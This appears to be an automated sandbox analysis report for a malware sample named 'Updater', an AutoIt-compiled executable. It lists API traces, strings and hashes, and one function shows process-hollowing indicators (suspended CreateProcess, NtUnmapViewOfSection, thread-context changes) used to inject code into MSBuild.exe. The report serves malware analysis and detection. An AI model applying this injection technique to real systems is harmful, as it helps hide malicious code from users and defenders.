Start time:	12:11:24
Start date:	27/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0x3e0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	12:11:24
Start date:	27/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0x6c0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	8.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	61

Executed Functions

Function 014A19D5 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 186
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 014A19F0
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 014A1A0E
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 014A1A2C
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 014A1A4A
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,014A1AD9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 014A1A93
RegQueryValueExA.ADVAPI32(?,014A1C55,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,014A1AD9,?,80000001), ref: 014A1AB1
RegCloseKey.ADVAPI32(?,014A1AE0,00000000,00000000,00000005,00000000,014A1AD9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 014A1AD3
lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 014A1AF0
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 014A1AFD
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 014A1B03
lstrlen.KERNEL32(00000000), ref: 014A1B2E
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 014A1B83
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 014A1B93
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 014A1BBF
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 014A1BCF
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 014A1BF9
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 014A1C09

Strings

Software\Borland\Locales, xrefs: 014A1A04, 014A1A22
Software\Borland\Delphi\Locales, xrefs: 014A1A40

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: 5d406fc577966639fe776d678845add278b65b7ea4764b24b7dd735e40b36c7a
Instruction ID: a508c1c7bd197ab18d1036af1d2d1b16f12761f25b65261889a0bbeaf68edb63
Opcode Fuzzy Hash: 5d406fc577966639fe776d678845add278b65b7ea4764b24b7dd735e40b36c7a
Instruction Fuzzy Hash: 8B619875F4424E7EEF11DAE9CC45FEFBBBC9B28700F414096A605E2191D7B4DA448B50

Function 006E310D Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 220
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 006E313C

Part of subcall function 006DF82C: _wcslen.LIBCMT ref: 006DF83F

GetCurrentProcess.KERNEL32(?,0076D9B8,00000000,?,?), ref: 006E3253
IsWow64Process.KERNEL32(00000000,?,?), ref: 006E325A
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 006E3285
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 006E3297
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 006E32A5
FreeLibrary.KERNEL32(00000000,?,?), ref: 006E32AC
GetSystemInfo.KERNEL32(?,?,?), ref: 006E32D3

Strings

kernel32.dll, xrefs: 006E3280
l#z, xrefs: 006E3117
GetNativeSystemInfo, xrefs: 006E3291
`#z, xrefs: 006E32BD
l#z, xrefs: 006E318D

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$`#z$kernel32.dll$l#z$l#z
API String ID: 3290436268-2282951049
Opcode ID: 6d15e6530055b372df7109cf3ae2290a3ea9bc9db0cc3ca338b06896a42a83ef
Instruction ID: 6f297212757f8dc88435de64f1faf8ca24ca6cbec0522b96c3f0f17a47feeaac
Opcode Fuzzy Hash: 6d15e6530055b372df7109cf3ae2290a3ea9bc9db0cc3ca338b06896a42a83ef
Instruction Fuzzy Hash: C691C23290A3E5DFCF15C73D78450A93F666BA7301B14C899E5819B323DA2C4A07DB2E

Function 006E2D33 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 148
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006E2D63
IsDebuggerPresent.KERNEL32 ref: 006E2D76
GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 006E2DE2

Part of subcall function 006DF82C: _wcslen.LIBCMT ref: 006DF83F

Part of subcall function 006DA65C: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 006DA69D

SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 006E2E63
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00727988
SetCurrentDirectoryW.KERNEL32(?), ref: 007279C9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00791E24), ref: 00727A52
ShellExecuteW.SHELL32(00000000), ref: 00727A59

Part of subcall function 006E2C51: GetSysColorBrush.USER32(0000000F), ref: 006E2C5C
Part of subcall function 006E2C51: LoadCursorW.USER32(00000000,00007F00), ref: 006E2C6B
Part of subcall function 006E2C51: LoadIconW.USER32(00000063), ref: 006E2C81
Part of subcall function 006E2C51: LoadIconW.USER32(000000A4), ref: 006E2C93
Part of subcall function 006E2C51: LoadIconW.USER32(000000A2), ref: 006E2CA5
Part of subcall function 006E2C51: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 006E2CBD
Part of subcall function 006E2C51: RegisterClassExW.USER32(?), ref: 006E2D0E

Part of subcall function 006EFBB7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006EFBE5
Part of subcall function 006EFBB7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 006EFC06
Part of subcall function 006EFBB7: ShowWindow.USER32(00000000), ref: 006EFC1A
Part of subcall function 006EFBB7: ShowWindow.USER32(00000000), ref: 006EFC23

Part of subcall function 006E34C7: Shell_NotifyIconW.SHELL32(00000000,?), ref: 006E3598

Strings

AutoIt, xrefs: 0072797D
runas, xrefs: 00727A4D
p)z, xrefs: 006E2E2E
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00727982
p3z, xrefs: 006E2D86

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$p)z$p3z$runas
API String ID: 683915450-1358270189
Opcode ID: ddcd8b8ed02404e3d73a7fbfcea439b3401bba162c6ccdef4bc1729509ec446d
Instruction ID: 3a77fc558149eeb2bc6ba94d651848e8ecc94d7d2f2f8fa585360dc49c061978
Opcode Fuzzy Hash: ddcd8b8ed02404e3d73a7fbfcea439b3401bba162c6ccdef4bc1729509ec446d
Instruction Fuzzy Hash: CF516D7050C381AACF11EF65DC51DAE7BABABC3700F00453DF582462A3CA6C994BD76A

Function 014A1ADF Relevance: 15.1, APIs: 10, Instructions: 102
stringlibrarythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 014A1AF0
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 014A1AFD
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 014A1B03
lstrlen.KERNEL32(00000000), ref: 014A1B2E
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 014A1B83
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 014A1B93
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 014A1BBF
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 014A1BCF
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 014A1BF9
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 014A1C09

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID:
API String ID: 1599918012-0
Opcode ID: b30b88bd219cbaf4d9da21ce8602e9a1d9637ed92d71513b3b0053543624a1ba
Instruction ID: 35f8c17ed186be19ec8640d5ccdffb67fea846f404046e79cd6861b37c7b3f22
Opcode Fuzzy Hash: b30b88bd219cbaf4d9da21ce8602e9a1d9637ed92d71513b3b0053543624a1ba
Instruction Fuzzy Hash: 19316475E4424A7EEF11DAF9CC84FEFBBBC9B68700F4044A69244E3151E7B49A448B50

Function 006E3AD9 Relevance: 7.9, APIs: 5, Instructions: 373COMMON

Download Yara Rule

APIs

Part of subcall function 006E4E5A: GetWindowLongW.USER32(00000000,000000EB), ref: 006E4E6B

DefDlgProcW.USER32(?,?,?,?,?), ref: 006E4273
GetSysColor.USER32(0000000F), ref: 006E42C5
SetBkColor.GDI32(?,00000000), ref: 006E42D8

Part of subcall function 006E3AE2: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 006E3B2A

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: bfd52696b8c98dc9d0575a2c1021915675a42d1ae130225a11c8bf6ae15b771a
Instruction ID: 3e1716946ad248c6852005dfa23c9b20dc675124587f7e6b1417f6b64eff48b9
Opcode Fuzzy Hash: bfd52696b8c98dc9d0575a2c1021915675a42d1ae130225a11c8bf6ae15b771a
Instruction Fuzzy Hash: ACA1FC70107390BFE764AE7FAC4CDBF265EDB86300F154109F602D6696DE2E9E428276

Function 014A3ECD Relevance: 6.0, APIs: 4, Instructions: 37timefileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 014A3EE8
FindClose.KERNEL32(00000000,00000000,?), ref: 014A3EF3
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 014A3F0C
FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 014A3F1D

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: FileTime$Find$CloseDateFirstLocal
String ID:
API String ID: 2659516521-0
Opcode ID: 35532445bcddddf072de4610115932bee76e299e86bdf79fb3123370f2aa134a
Instruction ID: 5f9449cd95a26a0420f79bfb7ee580efcaec8a1d697030fdea210e82489ef796
Opcode Fuzzy Hash: 35532445bcddddf072de4610115932bee76e299e86bdf79fb3123370f2aa134a
Instruction Fuzzy Hash: 4BF01871D0120DA6CB51EAF98C84ECFB3BC5B38314F910797B558D71A1E674D7045B50

Function 006D7070 Relevance: 3.2, Strings: 2, Instructions: 659COMMON

Download Yara Rule

Strings

P3z, xrefs: 006D74FF
Variable is not of type 'Object'., xrefs: 007172FB

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID:
String ID: P3z$Variable is not of type 'Object'.
API String ID: 0-4245219305
Opcode ID: d21331f75ebe6edfd5c401910679ef4d2d9e6586939b5958cc5e3895103453d3
Instruction ID: e1cd7e586cdcbc955344d072114997e3f4b97fc5b89aa9facb82ef2425a8b9e4
Opcode Fuzzy Hash: d21331f75ebe6edfd5c401910679ef4d2d9e6586939b5958cc5e3895103453d3
Instruction Fuzzy Hash: 1A329D70D08218DBCF14DF94C890AEDB7B6FF55304F14805AE806AB392E779AE46DB52

Function 014B2CBF Relevance: 1.5, APIs: 1, Instructions: 3libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 014B2CC3

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 74906ca78a5ed234824da2d21b4ef579ad23ae74e18219abc59e4195ec916c3d
Instruction ID: be68be7296445d1d8c9efe5ed17a0ddc0ed5e3a0c0ce8a40cfea562a1559ef80
Opcode Fuzzy Hash: 74906ca78a5ed234824da2d21b4ef579ad23ae74e18219abc59e4195ec916c3d
Instruction Fuzzy Hash: 24A00231445A80DBDE11DB10CB49B09B761FBC0F01F108E64A0464781457785800D941

Function 006E51FB Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 283
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006E52D2
GetSystemMetrics.USER32(00000007), ref: 006E52DA
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006E5305
GetSystemMetrics.USER32(00000008), ref: 006E530D
GetSystemMetrics.USER32(00000004), ref: 006E5332
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 006E534F
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 006E535F
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 006E5392
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 006E53A6
GetClientRect.USER32(00000000,000000FF), ref: 006E53C4
GetStockObject.GDI32(00000011), ref: 006E53E0
SendMessageW.USER32(00000000,00000030,00000000), ref: 006E53EB

Part of subcall function 006E4B74: GetCursorPos.USER32(?), ref: 006E4B88
Part of subcall function 006E4B74: ScreenToClient.USER32(00000000,?), ref: 006E4BA5
Part of subcall function 006E4B74: GetAsyncKeyState.USER32(00000001), ref: 006E4BCE
Part of subcall function 006E4B74: GetAsyncKeyState.USER32(00000002), ref: 006E4BE8

SetTimer.USER32(00000000,00000000,00000028,006E3AA8), ref: 006E5412

Strings

AutoIt v3 GUI, xrefs: 006E538A
(z, xrefs: 00728DA2
(z, xrefs: 006E5236

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI$(z$(z
API String ID: 1458621304-3809366781
Opcode ID: ff7915132a5854d47aaed0cab7d520f0c699ead71ed1bef4eae2921425812d49
Instruction ID: 84e6ee769ff66da7ba1dcc06ca5410ce831f7c5054c6312b37ab8b4beddb3c1f
Opcode Fuzzy Hash: ff7915132a5854d47aaed0cab7d520f0c699ead71ed1bef4eae2921425812d49
Instruction Fuzzy Hash: D2B17A31A01309DFDB14DFA9DC49BAD3BB5FB48314F108229FA06AB291DB78A841CB55

Function 006DA76B Relevance: 32.2, APIs: 12, Strings: 6, Instructions: 702windowsleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 006DAA28
TranslateMessage.USER32(?), ref: 006DAB77
DispatchMessageW.USER32(?), ref: 006DAB85
Sleep.KERNEL32(0000000A,?,?), ref: 006DAB8F

Strings

P3z, xrefs: 007199B6
P3z, xrefs: 00719958
@GUI_CTRLID, xrefs: 0071992F
@GUI_WINHANDLE, xrefs: 00719991
P3z, xrefs: 00719A14
@GUI_CTRLHANDLE, xrefs: 007199EF

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Message$DispatchSleepTimeTranslatetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$P3z$P3z$P3z
API String ID: 1406140084-917982011
Opcode ID: 4140d7d23ef8017b551aa6841180c983faaed0c6342cf5f7b664482266d34ebe
Instruction ID: 6f80dad47c0f09699c20e183f3b053b38a832bc53b72f5f921c6d67175524091
Opcode Fuzzy Hash: 4140d7d23ef8017b551aa6841180c983faaed0c6342cf5f7b664482266d34ebe
Instruction Fuzzy Hash: E152F370A08341DFD724CF28C855BEAB7E2BF81304F14851EE59A8B391D778A985CB97

Function 014B7451 Relevance: 25.0, APIs: 6, Strings: 8, Instructions: 464
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,014B7A70), ref: 014B7556
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,014B7A70,00000000,00000000,00000000,00000000,00000000,00000004), ref: 014B757A
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,014B7A70), ref: 014B75AD
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,014B7A70,00000000,00000000,00000000,00000000,00000000,00000004), ref: 014B75CD
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,014B7A70,00000000,00000000,00000000,00000000,00000000,00000004), ref: 014B75FF

Part of subcall function 014B3125: GetTickCount.KERNEL32 ref: 014B319E

Part of subcall function 014B5EE9: MessageBoxA.USER32(00000000,00000000,014B5F49,00040040), ref: 014B5F1C

GetTickCount.KERNEL32 ref: 014B7A38

Strings

NtGetContextThread, xrefs: 014B7653
D, xrefs: 014B7506
NtUnmapViewOfSection, xrefs: 014B76AF
NtSetContextThread, xrefs: 014B77FE
NtResumeThread, xrefs: 014B7855
NtTerminateProcess, xrefs: 014B78A3, 014B793A, 014B7A2E
execution failure, try to assign other file path, xrefs: 014B78F2, 014B7988
NtFreeVirtualMemory, xrefs: 014B79F8

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: CreateProcess$CountTick$Message
String ID: execution failure, try to assign other file path$D$NtFreeVirtualMemory$NtGetContextThread$NtResumeThread$NtSetContextThread$NtTerminateProcess$NtUnmapViewOfSection
API String ID: 2713535555-1661097759
Opcode ID: 5e03d1ad98a0a88319701ce69aab4846dc2edaa1434c0bd2e8d402dc565e4ad8
Instruction ID: f8e76eb59711f01e9bb91cabf9b451e10500b56bc39110efc5ca6bcc3a1efc7d
Opcode Fuzzy Hash: 5e03d1ad98a0a88319701ce69aab4846dc2edaa1434c0bd2e8d402dc565e4ad8
Instruction Fuzzy Hash: 5712FF70A00219AFEB50DBA9CCC1FDEBBF4AB58705F10409AE604E72E1D774AA448F71

Function 006E3998 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,006E3992,?,?), ref: 006E3A00
KillTimer.USER32(?,00000001,?,?,?,?,?,006E3992,?,?), ref: 006E3A2C
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 006E3A4F
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,006E3992,?,?), ref: 006E3A5A
CreatePopupMenu.USER32 ref: 006E3A6E
PostQuitMessage.USER32(00000000), ref: 006E3A8F

Strings

p)z, xrefs: 006E3A81
p)z, xrefs: 00728126
p)z, xrefs: 007280EB
TaskbarCreated, xrefs: 006E3A55
p)z, xrefs: 006E3A9B
p)z, xrefs: 006E3A32

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated$p)z$p)z$p)z$p)z$p)z
API String ID: 129472671-3383597985
Opcode ID: b45cf93f5f906760fca7e3def4a5aa4e80d5d35e1e2c5aba8b190813c1878a39
Instruction ID: 69863cc7db3bfd0e2f27f37bae6e2c955c422b186f6add9bec02061b6fe1d958
Opcode Fuzzy Hash: b45cf93f5f906760fca7e3def4a5aa4e80d5d35e1e2c5aba8b190813c1878a39
Instruction Fuzzy Hash: 924148306053A4AADF251F3D9C0DBB93A57E742300F008238F542973A2DABD9E43875A

Function 006E0E5B Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006D1155: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF), ref: 006D1173

Part of subcall function 006EFD48: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,006E0F35), ref: 006EFD6A

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 006E0F78
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00726FEF
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00727030
RegCloseKey.ADVAPI32(?), ref: 00727072
_wcslen.LIBCMT ref: 007270D9
_wcslen.LIBCMT ref: 007270E8

Strings

\, xrefs: 007270EE
Software\AutoIt v3\AutoIt, xrefs: 006E0F6E
p3z, xrefs: 006E0F9A
\Include\, xrefs: 006E0F35
Include, xrefs: 00726FE6, 00727027
|(z, xrefs: 006E0E75

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
